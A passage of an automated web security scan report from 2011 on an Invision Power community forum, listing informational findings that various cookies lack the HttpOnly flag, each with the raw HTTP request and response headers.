The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /files/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:03:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c4518e20431b98df72194964285bdb2d; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:03:26 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:03:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.229. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:21:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=30910c4c96d14d702e574414884a3497; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:21:11 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Wed, 03-Feb-2010 00:21:13 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:21:15 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:21:15 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrXOtDI0sjQzszQyMTe2rgVcMFxcLwag; expires=Fri, 03-Feb-2012 00:21:15 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 45582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.230. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3936-ipdownloads-file-version-in-support-topic-title/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/3936-ipdownloads-file-version-in-support-topic-title/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:21:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=151105c5ef96a8ca424cbcb23ad26426; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:21:04 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Wed, 03-Feb-2010 00:21:06 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:21:07 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:21:07 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrPOtDI0sjQzszQyMTO1rgVcMFxcQQai; expires=Fri, 03-Feb-2012 00:21:07 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 44157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.231. http://community.invisionpower.com/files/file/3937-peace/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3937-peace/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/3937-peace/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:20:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f0d30a55563b91692a009fb0108cdacc; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:20:14 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Wed, 03-Feb-2010 00:20:18 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:20:19 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:20:19 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrfOtDI0sjQzszQyMbSwrgVcMFxcRgah; expires=Fri, 03-Feb-2012 00:20:19 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.232. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:20:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=050841a15905bd94621ba2b8c4063beb; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:20:09 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Wed, 03-Feb-2010 00:20:15 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:20:17 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:20:17 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0trDOtDI0sjQzszQyMTSwrgVcMFxcPgaa; expires=Fri, 03-Feb-2012 00:20:17 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 45637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.233. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3939-vietnamese-3xx-lang/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/3939-vietnamese-3xx-lang/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:19:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=53acd4c5908e05d2d2e80c209a6b789c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:19:57 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Wed, 03-Feb-2010 00:19:59 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:20:00 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:20:00 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0trTOtDI0sjQzszQytrS0rgVcMFxchAar; expires=Fri, 03-Feb-2012 00:20:00 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 43400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.234. http://community.invisionpower.com/files/file/3940-dp31-ihost/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3940-dp31-ihost/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/3940-dp31-ihost/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:19:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=eda4289dbe77e706c8645bcc74690868; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:19:49 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Wed, 03-Feb-2010 00:19:54 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:19:55 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:19:55 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbDOtDI0sjQzszQytjS0rgVcMFvtBps%2C; expires=Fri, 03-Feb-2012 00:19:55 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 45643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.235. http://community.invisionpower.com/files/file/3941-vanilla-valentine/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3941-vanilla-valentine/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/3941-vanilla-valentine/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:19:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=63686d6b634c361bbd7ab9845696337c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:19:41 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Wed, 03-Feb-2010 00:19:45 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:19:47 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:19:47 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbTOtDI0sjQzszQytjCyrgVcMFv8Bpw%2C; expires=Fri, 03-Feb-2012 00:19:47 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.236. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3942-sos31-file-version-in-online-list/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/3942-sos31-file-version-in-online-list/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:19:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=e55be40a69fde5836e702f1833e03ba0; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:19:36 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Wed, 03-Feb-2010 00:19:38 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:19:40 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:19:40 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbLOtDI0sjQzszQyNje3rgVcMFxcFwah; expires=Fri, 03-Feb-2012 00:19:40 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 43863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.237. http://community.invisionpower.com/files/file/3943-speed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3943-speed/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/3943-speed/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:19:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=301fa154e49cf717125680b3b4d173b8; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:19:24 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Wed, 03-Feb-2010 00:19:29 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:19:31 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:19:31 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbbOtDI0sjQzszQyNjO1rgVcMFxcHQaf; expires=Fri, 03-Feb-2012 00:19:31 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.238. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3944-ipchat-12-turkish-language-pack/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/3944-ipchat-12-turkish-language-pack/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:19:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=aab49df66667bdefe5db2ac84fb01281; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:19:20 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Wed, 03-Feb-2010 00:19:24 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:19:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:19:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbHOtDI0sjQzszQyNjO0rgVcMFxcIQac; expires=Fri, 03-Feb-2012 00:19:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 43775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.239. http://community.invisionpower.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?app=forums&module=forums&section=markasread&marktype=forum&forumid=1&returntoforumid=0&i=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
